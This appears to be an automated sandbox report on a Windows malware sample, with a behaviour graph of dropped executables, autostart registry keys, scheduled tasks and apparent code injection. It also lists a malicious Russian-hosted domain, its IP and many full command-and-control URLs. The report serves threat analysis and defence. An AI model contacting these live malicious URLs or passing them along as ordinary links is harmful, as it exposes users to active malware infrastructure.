  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428489 Sample: ppXCre3i9k.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 39 esdjasd.maxkrnldc.online 2->39 43 Found malware configuration 2->43 45 Antivirus detection for dropped file 2->45 47 Antivirus / Scanner detection for submitted sample 2->47 49 13 other signatures 2->49 8 ppXCre3i9k.exe 13 39 2->8         started        12 dllhost.exe 14 3 2->12         started        15 dllhost.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 31 C:\...\XYIphamTjljSgoBQQlfKpXxgNOIO.exe, PE32 8->31 dropped 33 C:\Users\...\XYIphamTjljSgoBQQlfKpXxgNOIO.exe, PE32 8->33 dropped 35 C:\Users\user\3D Objects\services.exe, PE32 8->35 dropped 37 9 other malicious files 8->37 dropped 51 Creates an undocumented autostart registry key 8->51 53 Creates multiple autostart registry keys 8->53 55 Creates an autostart registry key pointing to binary in C:\Windows 8->55 65 3 other signatures 8->65 19 cmd.exe 1 8->19         started        21 schtasks.exe 8->21         started        23 schtasks.exe 8->23         started        25 31 other processes 8->25 41 esdjasd.maxkrnldc.online 77.222.57.208, 49730, 49731, 49738 SWEB-ASRU Russian Federation 12->41 57 Antivirus detection for dropped file 12->57 59 System process connects to network (likely due to code injection or exploit) 12->59 61 Multi AV Scanner detection for dropped file 12->61 63 Machine Learning detection for dropped file 12->63 file6 signatures7 process8 process9 27 w32tm.exe 1 19->27         started        29 conhost.exe 19->29         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.222.57.208
 esdjasd.maxkrnldc.online Russian Federation
44112 SWEB-ASRU true

Contacted Domains

Name IP Active
esdjasd.maxkrnldc.online 77.222.57.208 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://esdjasd.maxkrnldc.online/L1nc0In.php?TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&TnqYKyaIywq=qs3uS75r3jqkbptI0tYXMWWVaJ&N8UxeC0d2aYn8OLau6G6fERS=XSlT&hUILssjwMhlL=rcGaJB6lZUMQIrCsGuPKf3Dfwgc1 true
    		unknown
    http://esdjasd.maxkrnldc.online/L1nc0In.php?aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&aJEFD=DIiJHxHsWaRJglNiUoApJ&IThUZKOIFYxaBzNs=mEB6eANyK32zZFYdk9PmxY7dNV2VFj&UlrYkIgnTTfOQ=TpTY6bz8FJOH true
      		unknown
      http://esdjasd.maxkrnldc.online/L1nc0In.php?UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&UDHxzzcas1EAv9DMmpw3fnZY=rCOtt0GvVNct1WrGn4NENdapnoSCQPr true
        		unknown
        http://esdjasd.maxkrnldc.online/L1nc0In.php?ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&ovGqtVTp5BaF90XbIwsVGXLk7k=vVAyytNBuojB9pcX5x true
          		unknown
          http://esdjasd.maxkrnldc.online/L1nc0In.php?P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&P0BWwn=xD8KOAFhnF&er6UzMZnhq2HEMUzYMEwRy=DOAeMSQttP8JwM4Bz6J true
            		unknown
            http://esdjasd.maxkrnldc.online/L1nc0In.php?RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&RVpUqBOi8pHAIsyoJmOvSI=fxU8LTF1zIvPTL2gmsQeSxS9T9dZc&1XIZJhVCCO2x=1WdfdQFmCB true
              		unknown
              http://esdjasd.maxkrnldc.online/L1nc0In.php?Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&Tzm6OxIQRqZYunjCd1MOgk=nBBU0zIwqR true
                		unknown
                http://esdjasd.maxkrnldc.online/@==gbJBzYuFDT true unknown
                http://esdjasd.maxkrnldc.online/L1nc0In.php?VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VEid32e=5KnOfaDp2o1CFqeYZF38NP&fhjudVNYdmm6E03w=rHwBASGojKEx9fcppIq5pk true
                  		unknown
                  http://esdjasd.maxkrnldc.online/L1nc0In.php?KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&KzH0=bh&DxjZjfOCS8Hqrt2FJM=4Pt5s true
                    		unknown
                    http://esdjasd.maxkrnldc.online/L1nc0In.php?wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&wV6yMDoEOp6CE4ikEee1q2H6Zy7H=EZuKHnNiGrv0rY8Q86rX&tJRGN3N9ZXFhdJQL16Q=C7xsA9eIpb1Q&AVQcE4u9jrTqTNOsFGAbCiwV=FOYET7gzwcyAswBfUdQ true
                      		unknown
                      http://esdjasd.maxkrnldc.online/L1nc0In.php?VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&VNzfEh38AspOaytSRK9BLXVflf=P3WpIeO4GbcHw2HzYd7uOVMZKu&m82T4iroEoDhuL4m0zDMJDh7Bn=l3r7eXql6OIhiENDLV6NiUsV&Hhpia4RQxGvXqiJDj7Y=SfI5AVlFaMRKVYX0BDfT0Qu true
                        		unknown
                        http://esdjasd.maxkrnldc.online/L1nc0In.php?WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t&93c8fc6a5829094a07918d043a4ab930=4466e54fac4c9d4ef3d0997a871fb311&6eb901588398ed62b3e4a5d26c80dcd1=gY0ETZycTO2YDZ1IDOxM2MzczY2MDO0MzYwE2M4E2M2UjNjRGO1QGN&WPqxBIO3l8KwOT9NhTLGwYvdmRH=idQh7nQF2GrDezz7t true
                          		unknown